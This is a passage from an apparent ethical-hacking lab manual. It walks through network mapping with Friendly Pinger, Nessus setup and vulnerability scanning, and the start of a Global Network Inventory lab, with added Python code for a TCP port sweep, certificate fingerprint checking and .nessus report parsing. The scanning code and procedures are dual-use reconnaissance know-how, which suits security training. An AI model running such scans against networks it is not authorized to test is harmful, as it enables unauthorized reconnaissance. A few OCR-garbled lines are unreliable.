Wizard results: The inquiry is completed. 4 devices found: 10.0.0.2 (WIN-MSSELCK4K41), 10.0.0.3 (Windows8), 10.0.0.5 (WIN-LXQN3WR3R9M), 10.0.0.7 (WIN-D39MR5HL9E4). Remove the tick from devices that you don't want to add to the map.
FIGURE 9.6: FPinger Scanning of Addresses completed
11. Set the default options in the Wizard selection windows and click Next
Wizard dialog: Devices type: Workstation. Address: Use IP-address / Use DNS-name (selected). Name: Remove DNS suffix. Addition: Add devices to the new map / Add devices to the current map (selected).
Press CTRL+I to get more information about the created map. You will see your name as the map author in the dialog window that appears.
Ping verifies a connection to a remote host by sending an ICMP (Internet Control Message Protocol) ECHO packet to the host and listening for an ECHO REPLY packet. A message is always sent to an IP address. If you do not specify an address but a hostname, this hostname is resolved to an IP address using your default DNS server. In this case you're vulnerable to a possible invalid entry on your DNS (Domain Name Server) server.
FIGURE 9.7: FPinger selecting the Devices type
12. The client area then displays the network map in the FPinger window
FIGURE 9.8: FPinger Client area with Network architecture
13. To scan a selected computer in the network, select the computer, select the Scan tab from the menu bar, and click Scan
FIGURE 9.9: FPinger Scanning the computers in the Network
14. It displays scanned details in the Scanning wizard
‫ם‬ If you want to ping
inside the network, behind
the firewall, there will be no
problems If you want to
ping other networks behind
the firewall, it must be
configured to let the ICMP
packets pass through. Your
network administrator
should do it for you. Same
with the proxy server.
^ You may download the
latest release:
http:/ /www.kilievich.com/
fpinger.
Q Select ‫״‬File|Options,
and configure Friendly
Pinger to your taste.
Scanning dialog: WIN-MSSELCK4K41 (http://WIN-MSSELCK4K41, service HTTP) and WIN-D39MR5HL9E4 (http://WIN-D39MR5HL9E4, service HTTP). Scanning complete.
Double-click the device to open it in Explorer.
FIGURE 9.10: FPinger Scanned results
15. Click the Inventory tab from the menu bar to view the configuration details of the selected computer
FIGURE 9.11: FPinger Inventory tab
16. The General tab of the Inventory wizard shows the computer name and installed operating system
Audit software and hardware components installed on the computers over the network.
Tracking user access and files opened on your computer via the network.
Inventory, General tab (tabs: General, Misc, Hardware, Software, History): Host name WIN-D39MR5HL9E4; User name Administrator; Windows name Windows Server 2012 Release Candidate Datacenter; Service pack (none); Collection time 8/22/2012 11:22:34 AM.
FIGURE 9.12: FPinger Inventory wizard General tab
17. The Misc tab shows the network IP addresses, MAC addresses, file system, and size of the disks
Inventory, Misc tab: Network: IP address 10.0.0.7, MAC address D4-BE-D9-C3-CE-2D; Total space 465.42 Gb, Free space 382.12 Gb; Display settings 1366x768, 60 Hz, True Color (32 bit).
Disk | Type | Free, Gb | Size, Gb | % | File System
C | Fixed | 15.73 | 97.31 | 84 | NTFS
D | Fixed | 96.10 | 97.66 | 2 | NTFS
FIGURE 9.13: FPinger Inventory wizard Misc tab
18. The Hardware tab shows the hardware component details of your
networked computers
Assignment of external commands (like telnet, tracert, net.exe) to devices.
Search of HTTP, FTP, e-mail and other network services.
The "Create Setup" function allows you to create a lite freeware version with your maps and settings.
Inventory, Hardware tab for WIN-D39MR5HL9E4: Processor 4x Intel Pentium III Xeon 3093; Memory 4096 Mb; BIOS AT/AT COMPATIBLE DELL 02/09/12; Monitors: Generic PnP Monitor; Display adapters: Intel(R) HD Graphics Family; Disk drives: ST3500413AS (Serial: W2A91RH6); Network adapters: Realtek PCIe GBE Family Controller; SCSI and RAID controllers: Microsoft Storage Spaces Controller.
FIGURE 9.14: FPinger Inventory wizard Hardware tab
19. The Software tab shows the software installed on the computers
Inventory, Software tab for WIN-D39MR5HL9E4 (columns Name, Version, Developer, Homepage): Adobe Reader X (10.1.3), eMailTrackerPro, EPSON USB Display, Friendly Pinger, Intel(R) Processor Graphics, Java(TM) 6 Update 17, Microsoft .NET Framework 4 Multi-Targeting Pack, Microsoft Application Error Reporting, Microsoft Office Excel MUI (English) 2010, Microsoft Office OneNote MUI (English) 2010, Microsoft Office Outlook MUI (English) 2010, Microsoft Office PowerPoint MUI (English) 2010, Microsoft Office Proof (English) 2010, Microsoft Office Proof (French) 2010, Microsoft Office Proof (Spanish) 2010, ...
FIGURE 9.15: FPinger Inventory wizard Software tab
Lab Analysis
Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.
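The inventory this lab asks you to document can also be collected without a GUI tool. The following is an added example, not part of the CEH lab manual and not code from Friendly Pinger: a small TCP connect sweep that classifies each probed port as open (handshake completed), closed (RST received) or filtered (no answer), treats a host as live if it answered at all, and renders the result as the lines to paste into the write-up. The port list, the range syntax and the default target range 10.0.0.1-10.0.0.20 are assumptions chosen to match the lab; adjust them to your environment.

```python
"""Added example (not from the CEH lab manual or Friendly Pinger): a minimal
TCP connect sweep that records, per host, which ports are open, closed or
filtered, so the results can be documented as the Lab Analysis asks."""
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor

# Assumed probe list: ports commonly exposed by Windows hosts in a lab network.
DEFAULT_PORTS = (21, 22, 23, 25, 80, 135, 139, 443, 445, 3389)


def probe_port(host, port, timeout=0.5):
    """Return 'open', 'closed' or 'filtered' for one TCP port.

    A completed three-way handshake means open; an immediate RST
    (ConnectionRefusedError) means the host is up but nothing listens;
    a timeout means a firewall dropped the SYN or the host is down.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, OSError):
        return "filtered"
    finally:
        sock.close()


def scan_host(host, ports=DEFAULT_PORTS, timeout=0.5, workers=32):
    """Probe every port on one host concurrently; return {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe_port(host, p, timeout), ports))
    return dict(zip(ports, states))


def expand_range(spec):
    """Accept '10.0.0.0/27' or '10.0.0.1-10.0.0.20' and yield IPv4Address objects."""
    if "-" in spec:
        first, last = (ipaddress.IPv4Address(p.strip()) for p in spec.split("-", 1))
        for n in range(int(first), int(last) + 1):
            yield ipaddress.IPv4Address(n)
    else:
        yield from ipaddress.IPv4Network(spec, strict=False).hosts()


def sweep(network, ports=DEFAULT_PORTS, timeout=0.5):
    """Scan every host in the range; keep only hosts that answered.

    A RST proves a host is up even when nothing listens, so a host with any
    open or closed port is live. Hosts whose every port is filtered are
    omitted, exactly as a ping sweep omits hosts that drop ICMP.
    """
    live = {}
    for ip in expand_range(network):
        result = scan_host(str(ip), ports, timeout)
        if any(state != "filtered" for state in result.values()):
            live[str(ip)] = result
    return live


def report(live):
    """Render the sweep result as one line per live host for the lab write-up."""
    lines = []
    for host in sorted(live, key=ipaddress.IPv4Address):
        states = live[host]
        opened = ",".join(str(p) for p, s in states.items() if s == "open") or "-"
        closed = ",".join(str(p) for p, s in states.items() if s == "closed") or "-"
        lines.append(f"{host}: open={opened} closed={closed}")
    return lines


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.0.0.1-10.0.0.20"
    for line in report(sweep(target)):
        print(line)
```

Run it as `python sweep.py 10.0.0.1-10.0.0.20` from the attacker machine. Note the three-state result: a port that times out is not the same as a port that refuses, and a host that never refuses anything is invisible to this sweep just as it is to a ping sweep, so filtered hosts still need a different technique.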
Tool/Utility: FriendlyPinger
Information Collected/Objectives Achieved:
IP address range scanned: 10.0.0.1 - 10.0.0.20
Found IP addresses:
■ 10.0.0.2
■ 10.0.0.3
■ 10.0.0.5
■ 10.0.0.7
Detailed result for 10.0.0.7:
■ Computer name
■ Operating system
■ IP address
■ MAC address
■ File system
■ Size of disk
■ Hardware information
■ Software information
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Does FPinger support proxy servers and firewalls?
2. Examine the programming language used in FPinger.
Internet Connection Required
□ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Lab
Scanning a Network Using the Nessus Tool
Nessus allows you to remotely audit a network and determine if it has been broken into or misused in some way. It also provides the ability to locally audit a specific machine for vulnerabilities.
Lab Scenario
In the previous lab, you learned to use Friendly Pinger to monitor network devices, receive server notifications, gather ping information, track user access via the network, view graphical traceroutes, and so on. Once attackers have information about network devices, they can use it as an entry point for a comprehensive attack on the network, ranging from DoS attacks to unauthorized administrative access. If attackers obtain traceroute information, they might use a methodology such as firewalking to determine which services a firewall allows through.
If an attacker gains physical access to a switch or other network device, he or she can install a rogue network device; therefore, as an administrator, you should disable unused ports in the device configuration. It is also important to have a methodology for detecting such rogue devices on the network.
As an expert ethical hacker and penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.
Lab Objectives
This lab will give you experience in scanning the network for vulnerabilities and show you how to use Nessus. It will teach you how to:
■ Use the Nessus tool
■ Scan the network for vulnerabilities
Lab Environment
To carry out the lab, you need:
■ Nessus, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus
■ You can also download the latest version of Nessus from http://www.tenable.com/products/nessus/nessus-download-agreement
■ If you decide to download the latest version, the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the Nessus tool
Lab Duration
Time: 20 Minutes
Overview of Nessus Tool
Nessus helps students learn, understand, and determine the vulnerabilities and weaknesses of a system and network in order to know how a system can be exploited. Network vulnerabilities include network topology and OS vulnerabilities, open ports and running services, application and service configuration errors, and application and service vulnerabilities.
Lab Tasks
TASK 1: Nessus Installation
1. To install Nessus, navigate to D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus
2. Double-click the Nessus-5.0.1-x86_64.msi file.
3. The Open File - Security Warning window appears. The dialog identifies the publisher as Tenable Network Security, Inc. and the file type as Windows Installer Package; only run the installer if the publisher shown is the one you expect. Click Run.
Note: Nessus is designed to automate the testing and discovery of known security problems. Nessus 2.x was released under the GPL, but Nessus 3 and later, including the 5.0.1 build used here, are proprietary software from Tenable Network Security; the HomeFeed used in this lab is licensed for non-commercial home use only.
FIGURE 10.1: Open File - Security Warning
4. The Nessus - InstallShield Wizard appears. During the installation process, the wizard prompts you for some basic information. Follow the instructions and click Next.
FIGURE 10.2: The Nessus installation window
5. Before you begin installation, you must agree to the license agreement, as shown in the following figure.
6. Select the radio button I accept the terms in the license agreement and click Next.
FIGURE 10.3: The Nessus InstallShield Wizard, License Agreement
7. Select a destination folder and click Next.
Note: The Nessus security checks database can be updated with the nessus-update-plugins command. Nessus can test SSL-wrapped services such as https, smtps, imaps, and more. The Nessus security scanner includes NASL (Nessus Attack Scripting Language), the language its plugins are written in.
FIGURE 10.4: The Nessus InstallShield Wizard, Destination Folder (default: C:\Program Files\Tenable\Nessus\)
8. The wizard prompts for the Setup Type. With the Complete option, all program features are installed. Select Complete and click Next.
FIGURE 10.5: The Nessus InstallShield Wizard, Setup Type
9. The Nessus wizard prompts you to confirm the installation. Click Install.
Note: Nessus gives you the choice of performing regular, non-destructive security audits on a routine basis. It probes a range of addresses on a network to determine which hosts are alive.
Note: Nessus probes the network services on each host to obtain banners that contain software and OS version information.
FIGURE 10.6: Nessus InstallShield Wizard, Ready to Install
10. Once installation is complete, click Finish.
FIGURE 10.7: Nessus InstallShield Wizard Completed
Nessus Major Directories
■ The Nessus home directory on Windows is C:\Program Files\Tenable\Nessus. The major directories of Nessus are shown in the following table.
Nessus Home Directory: C:\Program Files\Tenable\Nessus
Nessus Sub-Directory             Purpose
conf                             Configuration files
data                             Stylesheet templates
nessus\plugins                   Nessus plugins
nessus\users\<username>\kbs      User knowledge base saved on disk
nessus\logs                      Nessus log files
TABLE 10.1: Nessus Major Directories
11. After installation, Nessus opens in your default browser.
12. The Welcome to Nessus screen appears; click the here link to connect via SSL. The screen warns that you are likely to get a security alert from your web browser saying that the SSL certificate is invalid; you may either temporarily accept the risk or obtain a valid SSL certificate from a certificate authority (refer to the Nessus documentation for details).
FIGURE 10.8: Nessus SSL certificate notice
13. Click OK in the Security Alert pop-up, if it appears.
FIGURE 10.9: Internet Explorer Security Alert
14. Click the Continue to this website (not recommended) link to continue.
Note: During the installation and daily operation of Nessus, manipulating the Nessus service is generally not required. The Nessus Server Manager used in Nessus 4 has been deprecated; on Windows, Nessus 5 runs as the Tenable Nessus service.
The browser reports that there is a problem with the website's security certificate: the certificate was not issued by a trusted certificate authority and was issued for a different website's address, and it warns that certificate problems may indicate an attempt to fool you or intercept the data you send to the server. That warning is accurate. The certificate Nessus generates at install time is self-signed, so the browser cannot tell it apart from one presented by an attacker sitting between you and the scanner, and the credentials you are about to create travel over this connection. Before clicking through, compare the certificate fingerprint the browser displays with the fingerprint of the certificate on the Nessus host itself.
FIGURE 10.10: Internet Explorer website security certificate warning
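The following is an added example, not part of the CEH lab manual and not code shipped with Nessus, that turns the "compare the fingerprint" advice into a check you can run from the attacker machine: it retrieves the certificate the Nessus web interface actually presents, fingerprints it, and compares it in constant time with a fingerprint obtained out of band from the Nessus host (for example with openssl x509 -noout -fingerprint -sha256 on the server certificate file in the Nessus installation's CA directory; that file location is an assumption, check your install). The default port 8834 is the Nessus 5 web interface port.

```python
"""Added example (not from the CEH lab manual or from Nessus): verify the
Nessus web UI's self-signed certificate by fingerprint before accepting the
browser's certificate warning."""
import hashlib
import hmac
import socket
import ssl

NESSUS_PORT = 8834  # default port of the Nessus 5 web interface


def fingerprint_der(cert_der, algorithm="sha256"):
    """Colon-separated upper-case hex digest of a DER certificate, the format
    browsers and 'openssl x509 -noout -fingerprint -sha256' display."""
    digest = hashlib.new(algorithm, cert_der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def fingerprint_pem(pem_text, algorithm="sha256"):
    """Fingerprint of a PEM-encoded certificate, e.g. the server certificate
    file read directly on the Nessus host."""
    return fingerprint_der(ssl.PEM_cert_to_DER_cert(pem_text), algorithm)


def fetch_presented_cert(host, port=NESSUS_PORT, timeout=5.0):
    """Return the DER certificate the TLS server at host:port presents.

    Chain verification is disabled on purpose: a self-signed certificate can
    never verify against the system trust store, and the point here is to
    retrieve it so it can be compared with a fingerprint obtained out of band.
    No HTTP request, and no credential, is sent on this socket.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


def fingerprints_match(presented, expected):
    """Compare two fingerprints regardless of case or ':' separators, using a
    constant-time comparison."""
    def norm(s):
        return s.replace(":", "").replace(" ", "").lower().encode("ascii")
    a, b = norm(presented), norm(expected)
    return len(a) == len(b) and hmac.compare_digest(a, b)


def verify_nessus_ui(host, expected_fingerprint, port=NESSUS_PORT):
    """True only if the certificate actually served matches the expected one."""
    presented = fingerprint_der(fetch_presented_cert(host, port))
    return fingerprints_match(presented, expected_fingerprint)


if __name__ == "__main__":
    import sys
    # usage: python verify_nessus_cert.py <nessus-host> <fingerprint-from-nessus-host>
    host, expected = sys.argv[1], sys.argv[2]
    ok = verify_nessus_ui(host, expected)
    print("MATCH: the browser is talking to your Nessus server" if ok
          else "MISMATCH: do not continue; something else is terminating TLS")
    sys.exit(0 if ok else 1)
```

If the fingerprints differ, the sensible response is the one the browser recommends: close the page and find out what is answering on port 8834, rather than creating the admin account over that connection.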
15. Click OK in the Security Alert pop-up, if it appears.
FIGURE 10.11: Internet Explorer Security Alert
16. The Thank you for installing Nessus screen appears. It summarizes what Nessus allows you to perform: high-speed vulnerability discovery, to determine which hosts are running which services; agentless auditing; compliance checks, to verify and prove that every host on your network adheres to your security policy; scan scheduling; and more. Click the Get Started > button.
FIGURE 10.11: Nessus Getting Started
17. In Initial Account Setup, create the admin user for the scanner: enter a login (here, admin) and password, confirm the password, and click Next >. You will use these credentials to log in to Nessus later in this lab.
Note: Because of the technical implementation of SSL certificates, it is not possible to ship a certificate with Nessus that would be trusted by browsers. To avoid the certificate warning, a custom certificate issued for your organization must be installed.
The Initial Account Setup screen explains that this admin user has administrative control of the scanner: the admin can create and delete users, stop ongoing scans, and change the scanner configuration. Because the admin user can change the scanner configuration, the admin can effectively execute commands on the host running Nessus; therefore the admin user should be considered to have the same privileges as the root (or Administrator) user on that host, and the account should be protected accordingly.
FIGURE 10.12: Nessus Initial Account Setup
18. In Plugin Feed Registration, you need to enter an activation code. To obtain an activation code, click the http://www.nessus.org/register/ link.
19. On the Obtain an Activation Code page, click the Using Nessus at Home? icon.
Note: If you are using Tenable SecurityCenter, the Activation Code and plugin updates are managed from SecurityCenter. Nessus needs to be started to be able to communicate with SecurityCenter, which it will normally not do without a valid Activation Code and plugins.
FIGURE 10.13: Nessus Obtaining an Activation Code
20. On the Nessus for Home page, accept the subscription agreement by clicking the Agree button, as shown in the following figure.
The subscription agreement states that the Nessus HomeFeed subscription is available for personal use only and is not for use by any commercial organization; commercial use requires the ProfessionalFeed.
FIGURE 10.14: Nessus Subscription Agreement
21. Fill in the Register a HomeFeed section with the e-mail address to which the activation code will be sent, and click Register.
FIGURE 10.15: Nessus Registering a HomeFeed
22. The Thank You for Registering window appears for the Tenable Nessus HomeFeed.
Note: If you do not register your copy of Nessus, you will not receive any new plugins and will be unable to start the Nessus server. The Activation Code is not case sensitive.
Note: After the initial registration, Nessus downloads and compiles the plugins obtained over port 443 from plugins.nessus.org (plugins-customers.nessus.org for ProfessionalFeed customers), so outbound HTTPS to those hosts must be permitted from the scanner.
The Thank You for Registering page confirms that an e-mail containing the activation code has been sent to the address you provided, and notes that the HomeFeed is available for home use only: to use Nessus at your place of business you must purchase the Nessus ProfessionalFeed, or alternatively a subscription to the cloud-based Nessus Perimeter Service, which does not require any software download.
FIGURE 10.16: Nessus Registration Completed
23. Now log in to your e-mail account and retrieve the HomeFeed activation code sent to you at the time of registration, as shown in the following figure.
FIGURE 10.17: Nessus registration e-mail
24. Enter the activation code received in your e-mail and click Next >.
The Plugin Feed Registration screen explains that, as information about new vulnerabilities is discovered and released into the public domain, Tenable's research staff designs programs ("plugins") that enable Nessus to detect their presence. The plugins contain the vulnerability information, the algorithm to test for the presence of the security issue, and a set of remediation actions. To use Nessus, you need to subscribe to a Plugin Feed: to use Nessus at your workplace, purchase a commercial ProfessionalFeed; to use Nessus in a non-commercial home environment, you can get a HomeFeed for free; Tenable SecurityCenter users enter SecurityCenter in the activation code field; to perform offline plugin updates, enter offline in the field. Optional proxy settings can be supplied on the same screen.
Note: Once the plugins have been downloaded and compiled, the Nessus GUI will initialize and the Nessus server will start.
FIGURE 10.18: Nessus Applying Activation Code
25. The Registering window appears, as shown in the following screenshot.
FIGURE 10.19: Nessus Registering Activation Code
26. After successful registration (the page reports Successfully registered the scanner with Tenable and Successfully created the user), click Next: Download plugins > to download the Nessus plugins.
Note: Nessus server configuration is managed via the GUI; the nessusd.conf file is deprecated. In addition, proxy settings, subscription feed registration, and offline updates are managed via the GUI.
FIGURE 10.20: Nessus Downloading Plugins
27. Nessus starts fetching the newest plugin set and installs it. Downloading, compiling, and initializing the plugins takes some time.
FIGURE 10.21: Nessus fetching the newest plugin set
28. The Nessus Log In page appears. Enter the Username and Password you created in Initial Account Setup and click Log In.
FIGURE 10.22: The Nessus Log In screen
29. The Nessus HomeFeed window appears, restating the HomeFeed licensing terms. Click OK.
FIGURE 10.23: Nessus HomeFeed subscription
TASK 2: Network Scan Vulnerabilities
Note: For the item SSH user name, enter the name of the account that is dedicated to Nessus on each of the scan target systems.
30. After you successfully log in, the Nessus main window appears, as shown in the following screenshot.
FIGURE 10.24: The Nessus main screen
31. If you have an Administrator role, you can see the Users tab, which lists all users, their roles, and their last logins.
FIGURE 10.25: The Nessus administrator view
32. To add a new policy, click Policies -> Add Policy. Fill in the General policy sections, namely Basic, Scan, Network Congestion, Port Scanners, Port Scan Options, and Performance.
WARNING: Any changes to the Nessus scanner configuration affect ALL Nessus users. Edit these options carefully.
FIGURE 10.26: Adding Policies
33. To configure the credentials for the new policy, click the Credentials tab in the left pane of Add Policy.
Note: The most effective credentialed scans are those for which the supplied credentials have root (or Administrator) privileges on the targets.
FIGURE 10.27: Adding Policies and setting Credentials
34. To select the required plugins, click the Plugins tab in the left pane of Add Policy. Plugins are grouped into families (for example General and the platform-specific Local Security Checks families); each family can be enabled or disabled as a whole, or individual plugins can be toggled within it.
Note: If you are using Kerberos, you must configure the Nessus scanner to authenticate to a KDC.
FIGURE 10.28: Adding Policies and selecting Plugins
35. To configure preferences, click the Preferences tab in the left pane of Add Policy.
36. In the Plugin field, select Database settings from the drop-down list.
37. Enter the login details of the database account that Nessus should use to test the target database.
38. Enter Database SID: 4587, Database port to use: 124, and select Oracle auth type: SYSDBA.
39. Click Submit.
Note: If the policy is successfully added, the Nessus server displays a confirmation message.
FIGURE 10.29: Adding Policies and setting Preferences
40. The message Policy "NetworkScan_Policy" was successfully added is displayed, as shown below.
FIGURE 10.30: The NetworkScan Policy
41. Now click Scans -> Add to open the Add Scan window.
42. Fill in the Name, Type, Policy, and Scan Targets fields (a targets file can be uploaded instead of typing the targets).
43. In Scan Targets, enter the IP address of the host to scan; in this lab we are scanning 10.0.0.2.
44. Click Launch Scan at the bottom-right of the window.
Note: The IP addresses may differ in your lab environment.
Note: Nessus can save configured scan policies, network targets, and reports as a .nessus file.
FIGURE 10.31: Add Scan
45. The scan launches and starts scanning the target.
FIGURE 10.32: Scanning in progress
46. After the scan is complete, click the Reports tab.
FIGURE 10.33: Nessus Reports tab
47. Double-click Local Network to view the detailed scan report. The report lists each finding with its severity (Critical, High, Medium, Low, or Info), the affected port and service, and the plugin name.
FIGURE 10.34: Report of the scanned target
48. Double-click any result to display a more detailed synopsis, description, severity level, and solution.
FIGURE 10.35: Report of a scanned target
49. Click the Download Report button in the left pane.
50. In the Download Report dialog, choose a Download Format from the drop-down list; the native format has a .nessus extension and is an XML file that can be re-imported into Nessus or parsed by other tools. Chapter selection is not allowed for this format. Click Submit.
Note: If you are manually creating nessusrc files, there are several parameters that can be configured to specify SSH authentication.
FIGURE 10.36: Download Report with .nessus extension
51. Now click Log out.
52. To stop the scanner, stop the Tenable Nessus service from the Windows Services console (services.msc) or with net stop "Tenable Nessus" from an elevated command prompt; the Nessus Server Manager used in Nessus 4 is not part of Nessus 5.
FIGURE 10.37: Log out of Nessus
Lab Analysis
Document all the results and reports gathered during the lab.
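The .nessus file downloaded in step 50 is the most useful artifact to keep: it is XML in the NessusClientData_v2 layout, with one ReportHost element per target and one ReportItem per finding carrying port, protocol, svc_name, severity (0 = Info through 4 = Critical), pluginID and pluginName attributes. The following is an added example, not part of the CEH lab manual and not code from Nessus, that reads such a file and produces the per-host severity counts, the open-port list and a worst-first finding list for the write-up. The embedded report is a constructed sample in that layout; its hosts, results and severities are invented for illustration and are not output from the lab.

```python
"""Added example (not from the CEH lab manual or from Nessus): summarize a
Nessus v2 (.nessus) report for the lab write-up."""
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

# Constructed sample in the NessusClientData_v2 layout. Hosts, findings and
# severities are invented for the example and are not real scan results.
SAMPLE_REPORT = """<?xml version="1.0" ?>
<NessusClientData_v2>
<Policy><policyName>NetworkScan_Policy</policyName></Policy>
<Report name="Local Network">
  <ReportHost name="10.0.0.2">
    <HostProperties>
      <tag name="host-ip">10.0.0.2</tag>
      <tag name="operating-system">Microsoft Windows Server 2008</tag>
    </HostProperties>
    <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                pluginID="34477" pluginName="MS08-067: Server Service RCE (958644)">
      <synopsis>Arbitrary code can be executed on the remote host.</synopsis>
    </ReportItem>
    <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2"
                pluginID="57608" pluginName="SMB Signing not required"/>
    <ReportItem port="3389" svc_name="msrdp" protocol="tcp" severity="2"
                pluginID="18405" pluginName="Remote Desktop Protocol MITM Weakness"/>
    <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                pluginID="10287" pluginName="Traceroute Information"/>
  </ReportHost>
  <ReportHost name="10.0.0.7">
    <HostProperties><tag name="host-ip">10.0.0.7</tag></HostProperties>
    <ReportItem port="80" svc_name="www" protocol="tcp" severity="0"
                pluginID="10107" pluginName="HTTP Server Type and Version"/>
    <ReportItem port="0" svc_name="general" protocol="icmp" severity="1"
                pluginID="10114" pluginName="ICMP Timestamp Request Remote Date Disclosure"/>
  </ReportHost>
</Report>
</NessusClientData_v2>
"""


def parse_report(xml_text):
    """Flatten a .nessus v2 document into one dict per finding."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        props = {t.get("name"): t.text for t in host.iter("tag")}
        for item in host.iter("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "os": props.get("operating-system", "unknown"),
                "port": int(item.get("port")),          # 0 = host-level finding
                "protocol": item.get("protocol"),
                "service": item.get("svc_name"),
                "severity": int(item.get("severity")),
                "plugin_id": item.get("pluginID"),
                "plugin_name": item.get("pluginName"),
            })
    return findings


def summarize(findings, min_severity=1):
    """Per-host finding counts by severity name; Info is dropped by default."""
    per_host = defaultdict(Counter)
    for f in findings:
        if f["severity"] >= min_severity:
            per_host[f["host"]][SEVERITY_NAMES[f["severity"]]] += 1
    return {host: dict(counts) for host, counts in per_host.items()}


def open_ports(findings):
    """(protocol, port, service) tuples per host, recovered from the findings."""
    ports = defaultdict(set)
    for f in findings:
        if f["port"]:
            ports[f["host"]].add((f["protocol"], f["port"], f["service"]))
    return {host: sorted(p) for host, p in ports.items()}


def worst_first(findings, min_severity=1):
    """Findings ordered for triage: highest severity first, then host and port."""
    return sorted((f for f in findings if f["severity"] >= min_severity),
                  key=lambda f: (-f["severity"], f["host"], f["port"]))


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_REPORT
    found = parse_report(text)
    for host, counts in summarize(found).items():
        print(host, counts)
    for f in worst_first(found):
        print(f"{SEVERITY_NAMES[f['severity']]:8} {f['host']}:{f['port']}/{f['protocol']}  {f['plugin_name']}")
```

Run `python nessus_summary.py Local_Network.nessus` on the file you downloaded; with no argument it summarizes the embedded sample. Keeping the raw .nessus file alongside the write-up matters because it preserves plugin IDs, which is what you will need when re-scanning after remediation to show that a specific finding is gone.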
Tool/Utility: Nessus
Information Collected/Objectives Achieved:
Scan Target Machine: Local Host
Scan Policy Used: NetworkScan_Policy
Target IP Address: 10.0.0.2
Result: Local Host vulnerabilities
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Evaluate the OS platforms that Nessus has builds for. Evaluate whether Nessus works with SecurityCenter.
2. Determine how the Nessus license works in a VM (Virtual Machine) environment.
Internet Connection Required
☑ Yes □ No
Platform Supported
☑ Classroom □ iLabs
Auditing Scanning by using Global
Network Inventory
Global]Seh)•orkInventory is usedas an auditscannerin ~erodeploymentand
agent-free environments. It scansconrptiters byIP range, domain, con/p!itersorsingle
computers, definedby the GlobalNet!/‫׳‬ork Inventory hostfie.
Lab Scenario
With the development of network technologies and applications, network attacks are greatly increasing both in number and severity. Attackers always look for service vulnerabilities and application vulnerabilities on a network or servers. If an attacker finds a flaw or loophole in a service run over the Internet, the attacker will immediately use it to compromise the entire system and any other data found, and from there can compromise other systems on the network. Similarly, if the attacker finds a workstation with administrative privileges and faults in that workstation's applications, they can execute arbitrary code or implant viruses to intensify the damage to the network.
As a key technique in the network security domain, intrusion detection systems (IDSes) play a vital role in detecting various kinds of attacks and securing networks. As an administrator, you should make sure that services do not run as the root user, and should keep track of patches and updates for applications from vendors or security organizations such as CERT and CVE. Safeguards can be implemented so that email client software does not automatically open or execute attachments. In this lab, you will learn how networks are scanned using the Global Network Inventory tool.
Lab Objectives
This lab will show you how networks can be scanned and how to use Global
Network Inventory. It will teach you how to:
■ Use the Global Network Inventory tool
Lab Environment
To carry out the lab, you need:
■ Global Network Inventory tool located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\Global Network Inventory Scanner
■ You can also download the latest version of Global Network Inventory from this link: http://www.magnetosoft.com/products/global_network_inventory/gni_features.htm
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as attacker (host machine)
■ Another computer running Windows Server 2008 as victim (virtual machine)
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Global Network Inventory
■ Administrative privileges to run tools
Lab Duration
Time: 20 Minutes
Overview of Global Network Inventory
Global Network Inventory is one of the de facto tools for security auditing and testing of firewalls and networks; it can also be used for idle scanning.
Lab Tasks
1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 11.1: Windows Server 2012 - Desktop view
2. Click the Global Network Inventory app to open the Global Network Inventory window.
TASK 1: Scanning the network
Scan computers by IP range, by domain, single computers, or computers defined by the Global Network Inventory host file.
FIGURE 11.2: Windows Server 2012 - Apps
3. The Global Network Inventory main window appears as shown in the following figure.
4. The Tip of the Day window also appears; click Close.
Scan only the items that you need by customizing scan elements.
5. Turn on the Windows Server 2008 virtual machine from Hyper-V Manager.
FIGURE 11.3: Global Network Inventory Main Window
FIGURE 11.4: Windows 2008 Virtual Machine
6. Now switch back to the Windows Server 2012 machine; a new Audit Wizard window will appear. Click Next (or, in the toolbar, select the Scan tab and click Launch audit wizard).
Reliable IP detection and identification of network appliances such as network printers, document centers, hubs, and other devices.
Views scan results, including historic results for all scans, individual machines, or a selected number of addresses.
7. Select IP range scan and then click Next in the Audit Scan Mode wizard.
FIGURE 11.5: Global Network Inventory new audit wizard
FIGURE 11.6: Global Network Inventory Audit Scan Mode
8. Set an IP range to scan and then click Next in the IP Range Scan wizard.
